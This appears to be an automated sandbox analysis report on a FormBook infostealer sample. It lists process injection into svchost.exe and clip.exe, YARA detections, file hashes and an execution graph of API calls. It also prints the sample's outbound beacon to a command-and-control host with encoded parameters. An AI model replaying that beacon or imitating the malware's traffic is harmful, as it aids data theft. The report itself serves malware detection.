                                          Data Raw: 59 62 43 4c 3d 74 73 66 38 46 4e 69 49 70 4c 75 47 4a 6d 6b 48 33 77 38 59 49 4b 38 2f 58 74 6f 58 58 6d 77 65 44 6e 64 69 4f 30 5a 72 41 49 33 39 77 6e 49 32 4b 62 44 46 79 41 63 67 57 67 52 69 38 48 70 73 58 35 64 61 61 74 4f 62 6c 36 75 50 42 39 57 45 37 53 78 7a 32 7a 43 50 67 66 7a 61 30 6e 33 4e 67 2f 69 41 76 62 32 46 4d 64 6f 51 69 51 69 4e 61 46 30 56 4a 69 32 75 65 5a 44 7a 58 77 71 45 46 65 6d 51 77 58 4e 2f 4e 6b 50 77 50 75 68 48 6c 53 34 62 4a 6c 44 37 72 67 69 4e 69 35 68 6d 42 44 46 43 6e 2b 32 4f 41 4f 74 75 79 35 49 52 6c 30 64 30 38 4b 6d 76 34 49 61 33 62 6d 45 2b 58 45 56 66 2b 41 2f 52 68 65 73 57 44 78 7a 6b 33 65 66 57 54 72 4a 75 35 4a 38 33 5a 33 4a 70 59 62 73 47 72 33 66 70 71 77 41 78 54 64 4e 6e 45 56 4d 76 58 4c 47 39 6d 53 47 78 56 30 39 63 47 58 2f 34 65 4a 48 48 42 36 41 67 77 4b 37 34 5a 56 6e 71 6c 61 77 65 35 47 72 55 47 47 75 53 59 46 31 71 52 72 37 6d 2f 4c 56 63 49 44 36 46 62 57 74 44 4b 6e 2b 56 78 51 69 4b 55 66 52 49 62 57 6d 55 34 4f 6c 38 78 78 2f 4a 54 [TRUNCATED]
                                          Data Ascii: YbCL=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 [TRUNCATED]


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                          40 | 192.168.2.7 | 49747 | 172.67.210.102 | 80 | 6404 | C:\Program Files (x86)\tYPbEECIUNGebXluUbJulqzfdqlpyRqdLqNnjxNW\ftlDDsmJxbqfWuvUNSEx.exe
                                          Timestamp | Bytes transferred | Direction | Data
                                          Jul 4, 2024 16:55:47.617620945 CEST | 527 | OUT | GET /lfkn/?YbCL=gu3cG9GLpLv0C38agzY8Nc5HI9FnWTYycVQhN1coGdiN+H1mAKnEyno+ahRh93ZPWIJTdN+wkaWXNdzclzMT/Ba73/TyhXTi+N+fxoCuIe0q13OxeEQrax/xffncDH6aKqzo3DUBHR/D&fhW=BLvXr6e0EhyxeX HTTP/1.1
                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                          Accept-Language: en-us
                                          Host: www.dmtxwuatbz.cc
                                          Connection: close
                                          User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36



                                          Target ID:4
                                          Start time:10:52:02
                                          Start date:04/07/2024
                                          Path:C:\Users\user\Desktop\TOgpmvvWoj.exe
                                          Wow64 process (32bit):true
                                          Commandline:"C:\Users\user\Desktop\TOgpmvvWoj.exe"
                                          Imagebase:0xe10000
                                          File size:1'180'160 bytes
                                          MD5 hash:93E69765594E80AD7F8C1E906F145046
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:low
                                          Has exited:true

                                          Target ID:6
                                          Start time:10:52:03
                                          Start date:04/07/2024
                                          Path:C:\Windows\SysWOW64\svchost.exe
                                          Wow64 process (32bit):true
                                          Commandline:"C:\Users\user\Desktop\TOgpmvvWoj.exe"
                                          Imagebase:0x690000
                                          File size:46'504 bytes
                                          MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.1485611383.00000000032C0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.1485611383.00000000032C0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.1484985282.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.1484985282.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.1486102715.0000000003A00000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.1486102715.0000000003A00000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                          Reputation:moderate
                                          Has exited:true

                                          Target ID:8
                                          Start time:10:52:15
                                          Start date:04/07/2024
                                          Path:C:\Program Files (x86)\tYPbEECIUNGebXluUbJulqzfdqlpyRqdLqNnjxNW\ftlDDsmJxbqfWuvUNSEx.exe
                                          Wow64 process (32bit):true
                                          Commandline:"C:\Program Files (x86)\tYPbEECIUNGebXluUbJulqzfdqlpyRqdLqNnjxNW\ftlDDsmJxbqfWuvUNSEx.exe"
                                          Imagebase:0x300000
                                          File size:140'800 bytes
                                          MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.3763045399.0000000002FE0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000008.00000002.3763045399.0000000002FE0000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                          Reputation:high
                                          Has exited:false

                                          Target ID:9
                                          Start time:10:52:16
                                          Start date:04/07/2024
                                          Path:C:\Windows\SysWOW64\clip.exe
                                          Wow64 process (32bit):true
                                          Commandline:"C:\Windows\SysWOW64\clip.exe"
                                          Imagebase:0x180000
                                          File size:24'576 bytes
                                          MD5 hash:E40CB198EBCD20CD16739F670D4D7B74
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.3762941792.0000000002DC0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000009.00000002.3762941792.0000000002DC0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.3758152425.0000000002A10000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000009.00000002.3758152425.0000000002A10000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.3763129724.0000000002E00000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000009.00000002.3763129724.0000000002E00000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                          Reputation:moderate
                                          Has exited:false

                                          Target ID:11
                                          Start time:12:28:10
                                          Start date:04/07/2024
                                          Path:C:\Program Files (x86)\tYPbEECIUNGebXluUbJulqzfdqlpyRqdLqNnjxNW\ftlDDsmJxbqfWuvUNSEx.exe
                                          Wow64 process (32bit):true
                                          Commandline:"C:\Program Files (x86)\tYPbEECIUNGebXluUbJulqzfdqlpyRqdLqNnjxNW\ftlDDsmJxbqfWuvUNSEx.exe"
                                          Imagebase:0x300000
                                          File size:140'800 bytes
                                          MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:false

                                          Target ID:13
                                          Start time:12:28:22
                                          Start date:04/07/2024
                                          Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                          Wow64 process (32bit):false
                                          Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                          Imagebase:0x7ff722870000
                                          File size:676'768 bytes
                                          MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true


                                            Execution Graph

                                            Execution Coverage:4.1%
                                            Dynamic/Decrypted Code Coverage:0.4%
                                            Signature Coverage:2.9%
                                            Total number of Nodes:2000
                                            Total number of Limit Nodes:185
                                            execution_graph 97683 e37e93 97684 e37e9f __getstream 97683->97684 97720 e3a048 GetStartupInfoW 97684->97720 97686 e37ea4 97722 e38dbc GetProcessHeap 97686->97722 97688 e37efc 97689 e37f07 97688->97689 97805 e37fe3 58 API calls 3 library calls 97688->97805 97723 e39d26 97689->97723 97692 e37f0d 97693 e37f18 __RTC_Initialize 97692->97693 97806 e37fe3 58 API calls 3 library calls 97692->97806 97744 e3d812 97693->97744 97696 e37f27 97697 e37f33 GetCommandLineW 97696->97697 97807 e37fe3 58 API calls 3 library calls 97696->97807 97763 e45173 GetEnvironmentStringsW 97697->97763 97700 e37f32 97700->97697 97703 e37f4d 97704 e37f58 97703->97704 97808 e332f5 58 API calls 3 library calls 97703->97808 97773 e44fa8 97704->97773 97707 e37f5e 97708 e37f69 97707->97708 97809 e332f5 58 API calls 3 library calls 97707->97809 97787 e3332f 97708->97787 97711 e37f71 97712 e37f7c __wwincmdln 97711->97712 97810 e332f5 58 API calls 3 library calls 97711->97810 97793 e1492e 97712->97793 97715 e37f90 97716 e37f9f 97715->97716 97811 e33598 58 API calls _doexit 97715->97811 97812 e33320 58 API calls _doexit 97716->97812 97719 e37fa4 __getstream 97721 e3a05e 97720->97721 97721->97686 97722->97688 97813 e333c7 36 API calls 2 library calls 97723->97813 97725 e39d2b 97814 e39f7c InitializeCriticalSectionAndSpinCount __getstream 97725->97814 97727 e39d30 97728 e39d34 97727->97728 97816 e39fca TlsAlloc 97727->97816 97815 e39d9c 61 API calls 2 library calls 97728->97815 97731 e39d39 97731->97692 97732 e39d46 97732->97728 97733 e39d51 97732->97733 97817 e38a15 97733->97817 97736 e39d93 97825 e39d9c 61 API calls 2 library calls 97736->97825 97739 e39d72 97739->97736 97741 e39d78 97739->97741 97740 e39d98 97740->97692 97824 e39c73 58 API calls 4 library calls 97741->97824 97743 e39d80 GetCurrentThreadId 97743->97692 97745 e3d81e __getstream 97744->97745 97837 e39e4b 97745->97837 97747 e3d825 97748 e38a15 __calloc_crt 58 API calls 97747->97748 97751 e3d836 
97748->97751 97749 e3d841 @_EH4_CallFilterFunc@8 __getstream 97749->97696 97750 e3d8a1 GetStartupInfoW 97756 e3d8b6 97750->97756 97758 e3d9e5 97750->97758 97751->97749 97751->97750 97752 e3daad 97846 e3dabd LeaveCriticalSection _doexit 97752->97846 97754 e38a15 __calloc_crt 58 API calls 97754->97756 97755 e3da32 GetStdHandle 97755->97758 97756->97754 97756->97758 97759 e3d904 97756->97759 97757 e3da45 GetFileType 97757->97758 97758->97752 97758->97755 97758->97757 97845 e3a06b InitializeCriticalSectionAndSpinCount 97758->97845 97759->97758 97760 e3d938 GetFileType 97759->97760 97844 e3a06b InitializeCriticalSectionAndSpinCount 97759->97844 97760->97759 97764 e45184 97763->97764 97765 e37f43 97763->97765 97766 e38a5d __malloc_crt 58 API calls 97764->97766 97769 e44d6b GetModuleFileNameW 97765->97769 97767 e451aa _memmove 97766->97767 97768 e451c0 FreeEnvironmentStringsW 97767->97768 97768->97765 97770 e44d9f _wparse_cmdline 97769->97770 97771 e38a5d __malloc_crt 58 API calls 97770->97771 97772 e44ddf _wparse_cmdline 97770->97772 97771->97772 97772->97703 97774 e44fc1 __wsetenvp 97773->97774 97775 e44fb9 97773->97775 97776 e38a15 __calloc_crt 58 API calls 97774->97776 97775->97707 97777 e44fea __wsetenvp 97776->97777 97777->97775 97779 e38a15 __calloc_crt 58 API calls 97777->97779 97780 e45041 97777->97780 97781 e45066 97777->97781 97784 e4507d 97777->97784 97917 e44857 58 API calls __beginthread 97777->97917 97778 e32f95 _free 58 API calls 97778->97775 97779->97777 97780->97778 97782 e32f95 _free 58 API calls 97781->97782 97782->97775 97918 e39006 IsProcessorFeaturePresent 97784->97918 97786 e45089 97786->97707 97788 e3333b __IsNonwritableInCurrentImage 97787->97788 97941 e3a711 97788->97941 97790 e33359 __initterm_e 97792 e33378 _doexit __IsNonwritableInCurrentImage 97790->97792 97944 e32f80 97790->97944 97792->97711 97794 e14948 97793->97794 97804 e149e7 97793->97804 97795 e14982 IsThemeActive 97794->97795 97979 e335ac 97795->97979 97799 e149ae 97991 e14a5b 
SystemParametersInfoW SystemParametersInfoW 97799->97991 97801 e149ba 97992 e13b4c 97801->97992 97803 e149c2 SystemParametersInfoW 97803->97804 97804->97715 97805->97689 97806->97693 97807->97700 97811->97716 97812->97719 97813->97725 97814->97727 97815->97731 97816->97732 97819 e38a1c 97817->97819 97820 e38a57 97819->97820 97822 e38a3a 97819->97822 97826 e45446 97819->97826 97820->97736 97823 e3a026 TlsSetValue 97820->97823 97822->97819 97822->97820 97834 e3a372 Sleep 97822->97834 97823->97739 97824->97743 97825->97740 97827 e45451 97826->97827 97832 e4546c 97826->97832 97828 e4545d 97827->97828 97827->97832 97835 e38d68 58 API calls __getptd_noexit 97828->97835 97830 e4547c HeapAlloc 97831 e45462 97830->97831 97830->97832 97831->97819 97832->97830 97832->97831 97836 e335e1 DecodePointer 97832->97836 97834->97822 97835->97831 97836->97832 97838 e39e6f EnterCriticalSection 97837->97838 97839 e39e5c 97837->97839 97838->97747 97847 e39ed3 97839->97847 97841 e39e62 97841->97838 97871 e332f5 58 API calls 3 library calls 97841->97871 97844->97759 97845->97758 97846->97749 97848 e39edf __getstream 97847->97848 97849 e39f00 97848->97849 97850 e39ee8 97848->97850 97859 e39f21 __getstream 97849->97859 97875 e38a5d 97849->97875 97872 e3a3ab 58 API calls __NMSG_WRITE 97850->97872 97852 e39eed 97873 e3a408 58 API calls 6 library calls 97852->97873 97856 e39ef4 97874 e332df GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 97856->97874 97857 e39f2b 97862 e39e4b __lock 58 API calls 97857->97862 97858 e39f1c 97881 e38d68 58 API calls __getptd_noexit 97858->97881 97859->97841 97863 e39f32 97862->97863 97865 e39f57 97863->97865 97866 e39f3f 97863->97866 97883 e32f95 97865->97883 97882 e3a06b InitializeCriticalSectionAndSpinCount 97866->97882 97869 e39f4b 97889 e39f73 LeaveCriticalSection _doexit 97869->97889 97872->97852 97873->97856 97877 e38a6b 97875->97877 97878 e38a9d 97877->97878 97880 e38a7e 97877->97880 97890 e3594c 97877->97890 97878->97857 97878->97858 
[Execution graph residue: this portion of the report is the Joe Sandbox function call graph rendered as a flat list of node IDs and edges (function addresses in the e13xxx to e7xxxx range, each annotated with the Windows API or CRT routine it calls); the graph layout itself does not survive as text. Windows APIs named in the recovered edges: Sleep, RtlAllocateHeap, RtlFreeHeap, GetLastError, EncodePointer, DecodePointer, RaiseException, IsDebuggerPresent, SetUnhandledExceptionFilter, UnhandledExceptionFilter, IsProcessorFeaturePresent, GetCurrentProcess, TerminateProcess, ExitProcess, GetModuleHandleW, GetModuleHandleExW, GetProcAddress, LoadLibraryA, LoadLibraryExW, FreeLibrary, GetModuleFileNameW, MessageBoxA, GetCurrentDirectoryW, SetCurrentDirectoryW, GetFullPathNameW, GetLongPathNameW, GetOpenFileNameW, AllocateAndInitializeSid, CheckTokenMembership, FreeSid, GetSysColorBrush, LoadCursorW, LoadIconW, LoadImageW, RegisterClassExW, CreateWindowExW, ShowWindow, PeekMessageW, EnumResourceNamesW, FindResourceExW, LoadResource, SizeofResource, LockResource, CreateStreamOnHGlobal, VariantClear, GetSystemTimeAsFileTime, InitializeCriticalSectionAndSpinCount, EnterCriticalSection, LeaveCriticalSection, CreateFileW, GetFileType, ReadFile, GetConsoleMode, ReadConsoleW, MultiByteToWideChar, CloseHandle, FindCloseChangeNotification. CRT-internal routines named include __getptd_noexit, __dosmaperr, __call_reportfault, __invoke_watson, __crtCorExitProcess, __NMSG_WRITE, __lock, __beginthread, __malloc_crt, __wsopen_helper, __read_nolock, __write_nolock, __fseek_nolock, __lseeki64_nolock, __close_nolock, __fcloseall, _fprintf, _memset, _memmove, _wcscat, _wcscmp and a recurring "Mailbox" annotation. The listing is cut off mid-edge at its end.]
e4e473 99247->99250 99248->99244 99251 e16a0b 99248->99251 99253 e30ff6 Mailbox 59 API calls 99249->99253 99252 e14faa 84 API calls 99250->99252 99254 e16a17 99251->99254 99255 e4e47b 99251->99255 99252->99255 99274 e4e4d5 Mailbox 99253->99274 99296 e16bec 99254->99296 99406 e74534 90 API calls _wprintf 99255->99406 99259 e4e489 99259->99249 99260 e4e689 99261 e32f95 _free 58 API calls 99260->99261 99262 e4e691 99261->99262 99263 e14faa 84 API calls 99262->99263 99268 e4e69a 99263->99268 99267 e32f95 _free 58 API calls 99267->99268 99268->99267 99269 e14faa 84 API calls 99268->99269 99409 e6fcb1 89 API calls 4 library calls 99268->99409 99269->99268 99271 e17f41 59 API calls 99271->99274 99274->99260 99274->99268 99274->99271 99389 e6fc4d 99274->99389 99392 e1766f 99274->99392 99400 e174bd 99274->99400 99407 e6fb6e 61 API calls 2 library calls 99274->99407 99408 e77621 59 API calls Mailbox 99274->99408 99276 e148bb GetFullPathNameW 99275->99276 99276->99216 99276->99217 99278 e17894 99277->99278 99285 e17e8c 99278->99285 99280 e148f2 99280->99223 99282 e17f06 99281->99282 99283 e17ef9 99281->99283 99284 e30ff6 Mailbox 59 API calls 99282->99284 99283->99220 99284->99283 99286 e17e9a 99285->99286 99288 e17ea3 _memmove 99285->99288 99287 e17faf 59 API calls 99286->99287 99286->99288 99287->99288 99288->99280 99290 e134d4 99289->99290 99294 e134f3 _memmove 99289->99294 99293 e30ff6 Mailbox 59 API calls 99290->99293 99291 e30ff6 Mailbox 59 API calls 99292 e1350a 99291->99292 99292->99240 99293->99294 99294->99291 99295->99234 99297 e4e847 99296->99297 99298 e16c15 99296->99298 99501 e6fcb1 89 API calls 4 library calls 99297->99501 99415 e15906 60 API calls Mailbox 99298->99415 99301 e4e85a 99502 e6fcb1 89 API calls 4 library calls 99301->99502 99302 e16c37 99416 e15956 99302->99416 99306 e16c54 99308 e177c7 59 API calls 99306->99308 99307 e4e876 99338 e16cc1 99307->99338 99309 e16c60 99308->99309 99429 e30b9b 60 API calls __write_nolock 99309->99429 99311 e16c6c 99314 
e177c7 59 API calls 99311->99314 99312 e4e889 99315 e15dcf CloseHandle 99312->99315 99313 e16ccf 99316 e177c7 59 API calls 99313->99316 99317 e16c78 99314->99317 99318 e4e895 99315->99318 99319 e16cd8 99316->99319 99320 e148ae 60 API calls 99317->99320 99321 e14f3d 136 API calls 99318->99321 99322 e177c7 59 API calls 99319->99322 99323 e16c86 99320->99323 99324 e4e8b1 99321->99324 99325 e16ce1 99322->99325 99430 e159b0 ReadFile SetFilePointerEx 99323->99430 99327 e4e8da 99324->99327 99332 e797e5 122 API calls 99324->99332 99439 e146f9 99325->99439 99503 e6fcb1 89 API calls 4 library calls 99327->99503 99329 e16cf8 99333 e17c8e 59 API calls 99329->99333 99331 e16cb2 99431 e15c4e 99331->99431 99336 e4e8cd 99332->99336 99337 e16d09 SetCurrentDirectoryW 99333->99337 99334 e4e8f1 99367 e16e6c Mailbox 99334->99367 99339 e4e8d5 99336->99339 99340 e4e8f6 99336->99340 99345 e16d1c Mailbox 99337->99345 99338->99312 99338->99313 99341 e14faa 84 API calls 99339->99341 99342 e14faa 84 API calls 99340->99342 99341->99327 99343 e4e8fb 99342->99343 99344 e30ff6 Mailbox 59 API calls 99343->99344 99351 e4e92f 99344->99351 99347 e30ff6 Mailbox 59 API calls 99345->99347 99349 e16d2f 99347->99349 99348 e13bcd 99348->98008 99348->98030 99350 e1538e 59 API calls 99349->99350 99378 e16d3a Mailbox __wsetenvp 99350->99378 99352 e1766f 59 API calls 99351->99352 99386 e4e978 Mailbox 99352->99386 99353 e16e47 99497 e15dcf 99353->99497 99354 e4eb69 99507 e77581 59 API calls Mailbox 99354->99507 99360 e4eb8b 99508 e7f835 59 API calls 2 library calls 99360->99508 99363 e4eb98 99365 e32f95 _free 58 API calls 99363->99365 99364 e4ec02 99511 e6fcb1 89 API calls 4 library calls 99364->99511 99365->99367 99410 e15934 99367->99410 99369 e1766f 59 API calls 99369->99386 99370 e4ec1b 99370->99353 99372 e4ebfa 99510 e6fb07 59 API calls 4 library calls 99372->99510 99375 e17f41 59 API calls 99375->99378 99377 e6fc4d 59 API calls 99377->99386 99378->99353 99378->99364 99378->99372 99378->99375 99490 e159cd 
67 API calls _wcscpy 99378->99490 99491 e170bd GetStringTypeW 99378->99491 99492 e1702c 60 API calls __wcsnicmp 99378->99492 99493 e1710a GetStringTypeW __wsetenvp 99378->99493 99494 e3387d GetStringTypeW _iswctype 99378->99494 99495 e16a3c 165 API calls 3 library calls 99378->99495 99496 e17373 59 API calls Mailbox 99378->99496 99379 e17f41 59 API calls 99379->99386 99383 e4ebbb 99509 e6fcb1 89 API calls 4 library calls 99383->99509 99385 e4ebd4 99387 e32f95 _free 58 API calls 99385->99387 99386->99354 99386->99369 99386->99377 99386->99379 99386->99383 99504 e6fb6e 61 API calls 2 library calls 99386->99504 99505 e77621 59 API calls Mailbox 99386->99505 99506 e17373 59 API calls Mailbox 99386->99506 99388 e4ebe7 99387->99388 99388->99367 99390 e30ff6 Mailbox 59 API calls 99389->99390 99391 e6fc7d _memmove 99390->99391 99391->99274 99393 e1770f 99392->99393 99399 e17682 _memmove 99392->99399 99396 e30ff6 Mailbox 59 API calls 99393->99396 99394 e30ff6 Mailbox 59 API calls 99395 e17689 99394->99395 99397 e30ff6 Mailbox 59 API calls 99395->99397 99398 e176b2 99395->99398 99396->99399 99397->99398 99398->99274 99399->99394 99401 e174d0 99400->99401 99404 e1757e 99400->99404 99403 e30ff6 Mailbox 59 API calls 99401->99403 99405 e17502 99401->99405 99402 e30ff6 59 API calls Mailbox 99402->99405 99403->99405 99404->99274 99405->99402 99405->99404 99406->99259 99407->99274 99408->99274 99409->99268 99411 e15dcf CloseHandle 99410->99411 99412 e1593c Mailbox 99411->99412 99413 e15dcf CloseHandle 99412->99413 99414 e1594b 99413->99414 99414->99348 99415->99302 99417 e15dcf CloseHandle 99416->99417 99418 e15962 99417->99418 99512 e15df9 99418->99512 99420 e15981 99421 e159a4 99420->99421 99520 e15770 99420->99520 99421->99301 99421->99306 99423 e15993 99537 e153db SetFilePointerEx SetFilePointerEx 99423->99537 99425 e1599a 99425->99421 99426 e4e030 99425->99426 99538 e73696 SetFilePointerEx SetFilePointerEx WriteFile 99426->99538 99428 e4e060 99428->99421 99429->99311 
99430->99331 99438 e15c68 99431->99438 99432 e4e151 99552 e15dae SetFilePointerEx 99432->99552 99433 e15cef SetFilePointerEx 99551 e15dae SetFilePointerEx 99433->99551 99436 e15cc3 99436->99338 99437 e4e16b 99438->99432 99438->99433 99438->99436 99440 e177c7 59 API calls 99439->99440 99441 e1470f 99440->99441 99442 e177c7 59 API calls 99441->99442 99443 e14717 99442->99443 99444 e177c7 59 API calls 99443->99444 99445 e1471f 99444->99445 99446 e177c7 59 API calls 99445->99446 99447 e14727 99446->99447 99448 e1475b 99447->99448 99449 e4d8fb 99447->99449 99450 e179ab 59 API calls 99448->99450 99451 e181a7 59 API calls 99449->99451 99452 e14769 99450->99452 99453 e4d904 99451->99453 99454 e17e8c 59 API calls 99452->99454 99455 e17eec 59 API calls 99453->99455 99456 e14773 99454->99456 99458 e1479e 99455->99458 99457 e179ab 59 API calls 99456->99457 99456->99458 99459 e14794 99457->99459 99460 e147bd 99458->99460 99473 e147de 99458->99473 99475 e4d924 99458->99475 99462 e17e8c 59 API calls 99459->99462 99464 e17b52 59 API calls 99460->99464 99462->99458 99463 e4d9f4 99467 e17d2c 59 API calls 99463->99467 99468 e147c7 99464->99468 99465 e147ef 99466 e14801 99465->99466 99469 e181a7 59 API calls 99465->99469 99470 e14811 99466->99470 99471 e181a7 59 API calls 99466->99471 99485 e4d9b1 99467->99485 99472 e179ab 59 API calls 99468->99472 99468->99473 99469->99466 99474 e181a7 59 API calls 99470->99474 99476 e14818 99470->99476 99471->99470 99472->99473 99553 e179ab 99473->99553 99474->99476 99475->99463 99477 e4d9dd 99475->99477 99483 e4d95b 99475->99483 99478 e181a7 59 API calls 99476->99478 99487 e1481f Mailbox 99476->99487 99477->99463 99479 e4d9c8 99477->99479 99478->99487 99482 e17d2c 59 API calls 99479->99482 99480 e4d9b9 99481 e17d2c 59 API calls 99480->99481 99481->99485 99482->99485 99483->99480 99488 e4d9a4 99483->99488 99484 e17b52 59 API calls 99484->99485 99485->99473 99485->99484 99566 e17a84 59 API calls 2 library calls 99485->99566 99487->99329 99489 e17d2c 
59 API calls 99488->99489 99489->99485 99490->99378 99491->99378 99492->99378 99493->99378 99494->99378 99495->99378 99496->99378 99498 e15dd9 99497->99498 99499 e15de8 99497->99499 99499->99498 99501->99301 99502->99307 99503->99334 99504->99386 99505->99386 99506->99386 99507->99360 99508->99363 99509->99385 99510->99364 99511->99370 99513 e15e12 CreateFileW 99512->99513 99514 e4e181 99512->99514 99515 e15e34 99513->99515 99514->99515 99516 e4e187 CreateFileW 99514->99516 99515->99420 99516->99515 99517 e4e1ad 99516->99517 99518 e15c4e 2 API calls 99517->99518 99519 e4e1b8 99518->99519 99519->99515 99521 e4dfce 99520->99521 99522 e1578b 99520->99522 99536 e1581a 99521->99536 99545 e15e3f 99521->99545 99523 e15c4e 2 API calls 99522->99523 99522->99536 99524 e157ad 99523->99524 99525 e1538e 59 API calls 99524->99525 99527 e157b7 99525->99527 99527->99521 99528 e157c4 99527->99528 99529 e30ff6 Mailbox 59 API calls 99528->99529 99530 e157cf 99529->99530 99531 e1538e 59 API calls 99530->99531 99532 e157da 99531->99532 99539 e15d20 99532->99539 99534 e15807 99535 e15c4e 2 API calls 99534->99535 99535->99536 99536->99423 99537->99425 99538->99428 99540 e15d93 99539->99540 99541 e15d2e 99539->99541 99550 e15dae SetFilePointerEx 99540->99550 99542 e15d56 99541->99542 99544 e15d66 ReadFile 99541->99544 99542->99534 99544->99541 99544->99542 99546 e15c4e 2 API calls 99545->99546 99547 e15e60 99546->99547 99548 e15c4e 2 API calls 99547->99548 99549 e15e74 99548->99549 99549->99536 99550->99541 99551->99436 99552->99437 99554 e17a17 99553->99554 99555 e179ba 99553->99555 99556 e17e8c 59 API calls 99554->99556 99555->99554 99557 e179c5 99555->99557 99558 e179e8 _memmove 99556->99558 99559 e179e0 99557->99559 99560 e4ef32 99557->99560 99558->99465 99567 e18087 59 API calls Mailbox 99559->99567 99568 e18189 99560->99568 99563 e4ef3c 99564 e30ff6 Mailbox 59 API calls 99563->99564 99565 e4ef5c 99564->99565 99566->99485 99567->99558 99569 e30ff6 Mailbox 59 API calls 99568->99569 
99570 e18193 99569->99570 99570->99563 99571->98157 99573 e16ef5 99572->99573 99577 e17009 99572->99577 99574 e30ff6 Mailbox 59 API calls 99573->99574 99573->99577 99576 e16f1c 99574->99576 99575 e30ff6 Mailbox 59 API calls 99582 e16f91 99575->99582 99576->99575 99577->98161 99580 e174bd 59 API calls 99580->99582 99581 e1766f 59 API calls 99581->99582 99582->99577 99582->99580 99582->99581 99585 e163a0 99582->99585 99610 e66ac9 59 API calls Mailbox 99582->99610 99583->98164 99584->98166 99611 e17b76 99585->99611 99587 e165ca 99588 e1766f 59 API calls 99587->99588 99589 e165e4 Mailbox 99588->99589 99589->99582 99592 e163c5 99592->99587 99593 e4e41f 99592->99593 99594 e168f9 _memmove 99592->99594 99599 e1766f 59 API calls 99592->99599 99600 e17eec 59 API calls 99592->99600 99603 e4e3bb 99592->99603 99607 e17faf 59 API calls 99592->99607 99616 e160cc 60 API calls 99592->99616 99617 e15ea1 59 API calls Mailbox 99592->99617 99618 e15fd2 60 API calls 99592->99618 99619 e17a84 59 API calls 2 library calls 99592->99619 99620 e6fdba 91 API calls 4 library calls 99593->99620 99621 e6fdba 91 API calls 4 library calls 99594->99621 99597 e4e42d 99601 e1766f 59 API calls 99597->99601 99599->99592 99600->99592 99604 e18189 59 API calls 99603->99604 99605 e4e3c6 99604->99605 99609 e30ff6 Mailbox 59 API calls 99605->99609 99608 e1659b CharUpperBuffW 99607->99608 99608->99592 99609->99594 99610->99582 99612 e30ff6 Mailbox 59 API calls 99611->99612 99613 e17b9b 99612->99613 99614 e18189 59 API calls 99613->99614 99615 e17baa 99614->99615 99615->99592 99616->99592 99617->99592 99618->99592 99619->99592 99620->99597 99621->99589 99622->98179 99623->98180 99625 e14227 99624->99625 99626 e4d638 99624->99626 99625->98186 99650 e73226 62 API calls _W_store_winword 99625->99650 99626->99625 99627 e4d641 DestroyIcon 99626->99627 99627->99625 99650->98186 99713->98206 99714->98206 99715->98206 100154 e13633 100155 e1366a 100154->100155 100156 e136e7 100155->100156 100157 e13688 100155->100157 
